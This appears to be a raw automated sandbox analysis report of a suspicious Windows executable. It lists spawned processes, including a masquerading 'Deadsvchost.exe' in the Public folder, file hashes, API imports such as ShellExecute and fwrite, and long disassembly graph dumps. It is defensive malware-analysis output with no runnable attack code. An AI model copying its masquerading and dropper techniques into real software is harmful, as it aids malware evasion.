                                                                                                                                                                                Start time:13:37:27
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                                                                                                                                                Imagebase:0x7ff7403e0000
                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:30
                                                                                                                                                                                Start time:13:37:29
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                                                                                                                                                Imagebase:0x7ff7403e0000
                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:31
                                                                                                                                                                                Start time:13:37:30
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                                                                                                                                Imagebase:0x7ff7403e0000
                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:32
                                                                                                                                                                                Start time:13:37:30
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                                                                                                                                                Imagebase:0x7ff7403e0000
                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:33
                                                                                                                                                                                Start time:13:37:31
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Users\Public\Deadsvchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:"C:\Users\Public\Deadsvchost.exe"
                                                                                                                                                                                Imagebase:0xe90000
                                                                                                                                                                                File size:35'840 bytes
                                                                                                                                                                                MD5 hash:F1976EA02BFFAEF5AC943C2ABBB7426C
                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:true

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:34
                                                                                                                                                                                Start time:13:37:31
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                                                                                                                                                Imagebase:0x7ff7403e0000
                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:35
                                                                                                                                                                                Start time:13:37:32
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                                                                                                                                                Imagebase:0x7ff7403e0000
                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:36
                                                                                                                                                                                Start time:13:37:32
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p
                                                                                                                                                                                Imagebase:0x7ff7403e0000
                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:37
                                                                                                                                                                                Start time:13:37:32
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                                                                                                                                                Imagebase:0x7ff7403e0000
                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:38
                                                                                                                                                                                Start time:13:37:33
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                                                                                                                                                Imagebase:0x7ff7403e0000
                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:39
                                                                                                                                                                                Start time:13:37:33
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                                                                                                                                                                Imagebase:0x7ff7403e0000
                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:40
                                                                                                                                                                                Start time:13:37:33
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
                                                                                                                                                                                Imagebase:0x7ff7403e0000
                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:41
                                                                                                                                                                                Start time:13:37:34
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                                                                                                                                                Imagebase:0x7ff7403e0000
                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:42
                                                                                                                                                                                Start time:13:37:34
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                                                                                                                                                                Imagebase:0x7ff7403e0000
                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                General

                                                                                                                                                                                Target ID:43
                                                                                                                                                                                Start time:13:37:35
                                                                                                                                                                                Start date:22/10/2024
                                                                                                                                                                                Path:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:wmiadap.exe /F /T /R
                                                                                                                                                                                Imagebase:0x7ff67bdb0000
                                                                                                                                                                                File size:182'272 bytes
                                                                                                                                                                                MD5 hash:1BFFABBD200C850E6346820E92B915DC
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Has exited:false

                                                                                                                                                                                Disassembly

                                                                                                                                                                                Reset < >

                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:79.1%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                  Signature Coverage:9.1%
                                                                                                                                                                                  Total number of Nodes:22
                                                                                                                                                                                  Total number of Limit Nodes:1

                                                                                                                                                                                  Callgraph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  • Opacity -> Relevance
                                                                                                                                                                                  • Disassembly available
                                                                                                                                                                                  callgraph 0 Function_00401000 1 Function_004013C0 2 Function_00401481 4 Function_0040140B 2->4 3 Function_00401364 4->1 4->3 5 Function_0040108C 4->5 5->0

                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                  Function 00401481 Relevance: 9.1, APIs: 6, Instructions: 57COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.2153124807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.2153089355.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.2153143837.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.2153820071.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.2153820071.0000000000DB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_aoKTzGQSRP.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled__getmainargs__set_app_type_controlfpexitmemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3649950142-0
                                                                                                                                                                                  • Opcode ID: 705c49e648fd9b1a1d69ffeef501898fa4d241a22f223dcb615b77bf033cf5ca
                                                                                                                                                                                  • Instruction ID: af4c8621594d57ca62c0588ebca1cb350ddd3ff269c6439a5bcdebee5f5db335
                                                                                                                                                                                  • Opcode Fuzzy Hash: 705c49e648fd9b1a1d69ffeef501898fa4d241a22f223dcb615b77bf033cf5ca
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B110CF5E00204ABDB00EBA8DC85F4A73ACAB49308F144476F805E73A1E539E94487A9
                                                                                                                                                                                  Function 0040108C Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 211filestringCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.2153124807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.2153089355.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.2153143837.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.2153820071.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.2153820071.0000000000DB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_aoKTzGQSRP.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$ExecuteShell_sleepfclosefopenfwritegetenvmallocsprintfstrcmpstrcpy
                                                                                                                                                                                  • String ID: ! @$%s\%s$& @$5 @
                                                                                                                                                                                  • API String ID: 4133905814-3862653719
                                                                                                                                                                                  • Opcode ID: 8caced112e086ed638bbb8cf8541dd6d74207fc2c4a9ce55554e09d949d62a44
                                                                                                                                                                                  • Instruction ID: 4edde01989566f50ee057288f9be0b5ed355bef574f976823b0df2ad489e3bde
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8caced112e086ed638bbb8cf8541dd6d74207fc2c4a9ce55554e09d949d62a44
                                                                                                                                                                                  • Instruction Fuzzy Hash: A37116F1E001049BEB54DB9CDC81B9E77B9DB44309F04417AF609FB391E638AA84CB69
                                                                                                                                                                                  Function 00401000 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 22 401000-40102e malloc 23 401031-401039 22->23 24 401087-40108b 23->24 25 40103f-401085 23->25 25->23
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • 60x^x*=$y7sp(p^t=]gxy232ivwpmdiw, xrefs: 0040106E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.2153124807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.2153089355.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.2153143837.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.2153820071.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.2153820071.0000000000DB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_aoKTzGQSRP.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: malloc
                                                                                                                                                                                  • String ID: 60x^x*=$y7sp(p^t=]gxy232ivwpmdiw
                                                                                                                                                                                  • API String ID: 2803490479-2091870010
                                                                                                                                                                                  • Opcode ID: 91c712a457c5bcb1fe37ff218b7de2090aff4be442d454a9ca53cbc19ecf6a65
                                                                                                                                                                                  • Instruction ID: 98a03abeaff14c364fcb154303c0624157da0fb38b5f95688f54183b5f94f11a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 91c712a457c5bcb1fe37ff218b7de2090aff4be442d454a9ca53cbc19ecf6a65
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E11CCB0A05648EFCB04CFACD5907ADBBF1AF49304F1480AAE856E7391D635AE41DB45
                                                                                                                                                                                  Function 0040140B Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  • Executed
                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                  control_flow_graph 28 40140b-40145e call 401364 call 40108c call 4013c0
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000000.00000002.2153124807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  • Associated: 00000000.00000002.2153089355.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.2153143837.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.2153820071.0000000000DB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000000.00000002.2153820071.0000000000DB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_aoKTzGQSRP.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$_sleepfopenstrcmpstrcpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1474249034-0
                                                                                                                                                                                  • Opcode ID: 32f5e441197e13009756a199af0f2d775da6853747cb5064d38aa7e0490cc41e
                                                                                                                                                                                  • Instruction ID: 8dbf01f16cda25422d34b83b024fc2d07b066282400bdd01328831ed15b33d86
                                                                                                                                                                                  • Opcode Fuzzy Hash: 32f5e441197e13009756a199af0f2d775da6853747cb5064d38aa7e0490cc41e
                                                                                                                                                                                  • Instruction Fuzzy Hash: C3F098B5A00349EFDB40DFA8D885E8EB7F8BB49308F104465F958D7350D634EA54CBA4

                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:10.3%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                  Signature Coverage:12%
                                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                                  Total number of Limit Nodes:79
                                                                                                                                                                                  execution_graph 20132 7ff6fac0aef7 20133 7ff6fac0af06 20132->20133 20134 7ff6fac0af10 20132->20134 20136 7ff6fac00238 LeaveCriticalSection 20133->20136 19991 7ff6fabff88c 19992 7ff6fabffa7e 19991->19992 19994 7ff6fabff8ce _isindst 19991->19994 19993 7ff6fabfb108 _get_daylight 11 API calls 19992->19993 20011 7ff6fabffa6e 19993->20011 19994->19992 19997 7ff6fabff94e _isindst 19994->19997 19995 7ff6fabea9b0 _log10_special 8 API calls 19996 7ff6fabffa99 19995->19996 20012 7ff6fac06094 19997->20012 20001 7ff6fabffaaa 20004 7ff6fabfa4c4 _isindst 17 API calls 20001->20004 20006 7ff6fabffabe 20004->20006 20009 7ff6fabff9ab 20009->20011 20037 7ff6fac060d8 20009->20037 20011->19995 20013 7ff6fac060a3 20012->20013 20014 7ff6fabff96c 20012->20014 20044 7ff6fac001d8 EnterCriticalSection 20013->20044 20019 7ff6fac05498 20014->20019 20020 7ff6fac054a1 20019->20020 20024 7ff6fabff981 20019->20024 20021 7ff6fabfb108 _get_daylight 11 API calls 20020->20021 20022 7ff6fac054a6 20021->20022 20023 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 20022->20023 20023->20024 20024->20001 20025 7ff6fac054c8 20024->20025 20026 7ff6fac054d1 20025->20026 20027 7ff6fabff992 20025->20027 20028 7ff6fabfb108 _get_daylight 11 API calls 20026->20028 20027->20001 20031 7ff6fac054f8 20027->20031 20029 7ff6fac054d6 20028->20029 20030 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 20029->20030 20030->20027 20032 7ff6fac05501 20031->20032 20036 7ff6fabff9a3 20031->20036 20033 7ff6fabfb108 _get_daylight 11 API calls 20032->20033 20034 7ff6fac05506 20033->20034 20035 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 20034->20035 20035->20036 20036->20001 20036->20009 20045 7ff6fac001d8 EnterCriticalSection 20037->20045 20143 7ff6fabf4f20 20144 7ff6fabf4f2b 20143->20144 20152 7ff6fabff194 20144->20152 20165 7ff6fac001d8 EnterCriticalSection 20152->20165 17675 7ff6fabeb09c 17696 7ff6fabeb27c 17675->17696 17678 7ff6fabeb1f3 17837 7ff6fabeb59c IsProcessorFeaturePresent 17678->17837 17679 7ff6fabeb0bd __scrt_acquire_startup_lock 17681 7ff6fabeb1fd 17679->17681 17687 7ff6fabeb0db __scrt_release_startup_lock 17679->17687 17682 7ff6fabeb59c 7 API calls 17681->17682 17684 7ff6fabeb208 __CxxCallCatchBlock 17682->17684 17683 7ff6fabeb100 17685 7ff6fabeb186 17704 7ff6fabf9338 17685->17704 17687->17683 17687->17685 17826 7ff6fabf96e4 17687->17826 17689 7ff6fabeb18b 17710 7ff6fabe1000 17689->17710 17693 7ff6fabeb1af 17693->17684 17833 7ff6fabeb400 17693->17833 17697 7ff6fabeb284 17696->17697 17698 7ff6fabeb290 __scrt_dllmain_crt_thread_attach 17697->17698 17699 7ff6fabeb29d 17698->17699 17702 7ff6fabeb0b5 17698->17702 17844 7ff6fabf9f8c 17699->17844 17702->17678 17702->17679 17705 7ff6fabf9348 17704->17705 17707 7ff6fabf935d 17704->17707 17706 7ff6fabf8dc8 40 API calls 17705->17706 17705->17707 17708 7ff6fabf9366 17706->17708 17707->17689 17708->17707 17709 7ff6fabf9188 12 API calls 17708->17709 17709->17707 17711 7ff6fabe26b0 17710->17711 17887 7ff6fabf5220 17711->17887 17713 7ff6fabe26eb 17894 7ff6fabe25a0 17713->17894 17716 7ff6fabe26f8 17718 7ff6fabea9b0 _log10_special 8 API calls 17716->17718 17720 7ff6fabe2a6e 17718->17720 17831 7ff6fabeb6ec GetModuleHandleW 17720->17831 17721 7ff6fabe272c 17724 7ff6fabe1bd0 49 API calls 17721->17724 17722 7ff6fabe2836 18070 7ff6fabe31a0 17722->18070 17726 7ff6fabe2748 17724->17726 17729 7ff6fabe2994 17726->17729 17730 7ff6fabe299b 17726->17730 17727 7ff6fabe2885 18093 7ff6fabe1df0 GetCurrentProcessId 17727->18093 18099 7ff6fabe7440 GetConsoleWindow 17729->18099 17734 7ff6fabe29a4 17730->17734 17735 7ff6fabe299f 17730->17735 17732 7ff6fabe2878 17736 7ff6fabe289f 17732->17736 17737 7ff6fabe287d 17732->17737 17956 7ff6fabe7040 17734->17956 18104 7ff6fabe75b0 GetConsoleWindow 17735->18104 17742 7ff6fabe1bd0 49 API calls 17736->17742 18089 7ff6fabee444 17737->18089 17744 7ff6fabe28be 17742->17744 17743 7ff6fabe29b0 __vcrt_freefls 17745 7ff6fabe2ab3 17743->17745 17746 7ff6fabe29f2 17743->17746 17749 7ff6fabe18d0 114 API calls 17744->17749 18109 7ff6fabe30c0 17745->18109 17748 7ff6fabe7040 14 API calls 17746->17748 17751 7ff6fabe29fe 17748->17751 17752 7ff6fabe28df 17749->17752 17750 7ff6fabe2ac1 17753 7ff6fabe2ad4 17750->17753 17754 7ff6fabe2ae0 17750->17754 17969 7ff6fabe71b0 17751->17969 17752->17726 17756 7ff6fabe28ef 17752->17756 18112 7ff6fabe3210 17753->18112 17758 7ff6fabe1bd0 49 API calls 17754->17758 17760 7ff6fabe1df0 81 API calls 17756->17760 17770 7ff6fabe2a39 __vcrt_freefls 17758->17770 17759 7ff6fabe2a0d 17761 7ff6fabe2a84 17759->17761 17764 7ff6fabe2a17 17759->17764 17760->17716 17978 7ff6fabe7490 17761->17978 17974 7ff6fabe1bd0 17764->17974 17765 7ff6fabe2b0d 17768 7ff6fabe2a40 17765->17768 17769 7ff6fabe2b1e SetDllDirectoryW 17765->17769 17774 7ff6fabe1df0 81 API calls 17768->17774 17771 7ff6fabe2b32 17769->17771 17770->17768 18028 7ff6fabe7800 17770->18028 17773 7ff6fabe2c95 17771->17773 18033 7ff6fabe57b0 17771->18033 17777 7ff6fabe2ca0 17773->17777 17778 7ff6fabe2ca7 17773->17778 17774->17716 17780 7ff6fabe7440 4 API calls 17777->17780 17781 7ff6fabe2cb0 17778->17781 17782 7ff6fabe2cab 17778->17782 17784 7ff6fabe2ca5 17780->17784 18158 7ff6fabe2240 17781->18158 17785 7ff6fabe75b0 4 API calls 17782->17785 17783 7ff6fabe2b59 17786 7ff6fabe2bb6 17783->17786 17788 7ff6fabe2b70 17783->17788 18115 7ff6fabe57f0 17783->18115 17784->17781 17785->17781 17786->17773 17793 7ff6fabe2bcb 17786->17793 17802 7ff6fabe2b74 17788->17802 18136 7ff6fabe5b90 17788->18136 18050 7ff6fabe22a0 17793->18050 17797 7ff6fabe59d0 FreeLibrary 17801 7ff6fabe2cd6 17797->17801 17800 7ff6fabe1df0 81 API calls 17803 7ff6fabe2bae 17800->17803 17802->17786 17802->17800 18152 7ff6fabe59d0 17803->18152 17827 7ff6fabf971c 17826->17827 17828 7ff6fabf96fb 17826->17828 19986 7ff6fabf9fd8 17827->19986 17828->17685 17832 7ff6fabeb6fd 17831->17832 17832->17693 17834 7ff6fabeb411 17833->17834 17835 7ff6fabeb1c6 17834->17835 17836 7ff6fabebcb8 7 API calls 17834->17836 17835->17683 17836->17835 17838 7ff6fabeb5c2 _isindst memcpy_s 17837->17838 17839 7ff6fabeb5e1 RtlCaptureContext RtlLookupFunctionEntry 17838->17839 17840 7ff6fabeb60a RtlVirtualUnwind 17839->17840 17841 7ff6fabeb646 memcpy_s 17839->17841 17840->17841 17842 7ff6fabeb678 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17841->17842 17843 7ff6fabeb6c6 _isindst 17842->17843 17843->17681 17845 7ff6fac032ac 17844->17845 17846 7ff6fabeb2a2 17845->17846 17854 7ff6fabfc1a0 17845->17854 17846->17702 17848 7ff6fabebcb8 17846->17848 17849 7ff6fabebcc0 17848->17849 17850 7ff6fabebcca 17848->17850 17866 7ff6fabec054 17849->17866 17850->17702 17865 7ff6fac001d8 EnterCriticalSection 17854->17865 17867 7ff6fabec063 17866->17867 17868 7ff6fabebcc5 17866->17868 17874 7ff6fabec290 17867->17874 17870 7ff6fabec0c0 17868->17870 17871 7ff6fabec0eb 17870->17871 17872 7ff6fabec0ce DeleteCriticalSection 17871->17872 17873 7ff6fabec0ef 17871->17873 17872->17871 17873->17850 17878 7ff6fabec0f8 17874->17878 17879 7ff6fabec1e2 TlsFree 17878->17879 17884 7ff6fabec13c __vcrt_FlsAlloc 17878->17884 17880 7ff6fabec16a LoadLibraryExW 17882 7ff6fabec18b GetLastError 17880->17882 17883 7ff6fabec209 17880->17883 17881 7ff6fabec229 GetProcAddress 17881->17879 17882->17884 17883->17881 17885 7ff6fabec220 FreeLibrary 17883->17885 17884->17879 17884->17880 17884->17881 17886 7ff6fabec1ad LoadLibraryExW 17884->17886 17885->17881 17886->17883 17886->17884 17889 7ff6fabff380 17887->17889 17888 7ff6fabfa3d8 _invalid_parameter_noinfo 37 API calls 17893 7ff6fabff3fc 17888->17893 17890 7ff6fabff426 17889->17890 17891 7ff6fabff3d3 17889->17891 18171 7ff6fabff258 17890->18171 17891->17888 17893->17713 18179 7ff6fabeacb0 17894->18179 17897 7ff6fabe25db 18186 7ff6fabe1ed0 GetLastError 17897->18186 17898 7ff6fabe25f8 18181 7ff6fabe76f0 FindFirstFileExW 17898->18181 17902 7ff6fabe2665 18202 7ff6fabe78b0 17902->18202 17903 7ff6fabe260b 18193 7ff6fabe7770 CreateFileW 17903->18193 17904 7ff6fabea9b0 _log10_special 8 API calls 17907 7ff6fabe269d 17904->17907 17907->17716 17916 7ff6fabe18d0 17907->17916 17909 7ff6fabe2673 17912 7ff6fabe1e50 78 API calls 17909->17912 17914 7ff6fabe25ee 17909->17914 17910 7ff6fabe2634 __vcrt_FlsAlloc 17910->17902 17911 7ff6fabe261c 18196 7ff6fabe1e50 17911->18196 17912->17914 17914->17904 17917 7ff6fabe31a0 108 API calls 17916->17917 17918 7ff6fabe1905 17917->17918 17919 7ff6fabe1b96 17918->17919 17920 7ff6fabe6870 83 API calls 17918->17920 17921 7ff6fabea9b0 _log10_special 8 API calls 17919->17921 17922 7ff6fabe194b 17920->17922 17923 7ff6fabe1bb1 17921->17923 17955 7ff6fabe197c 17922->17955 18226 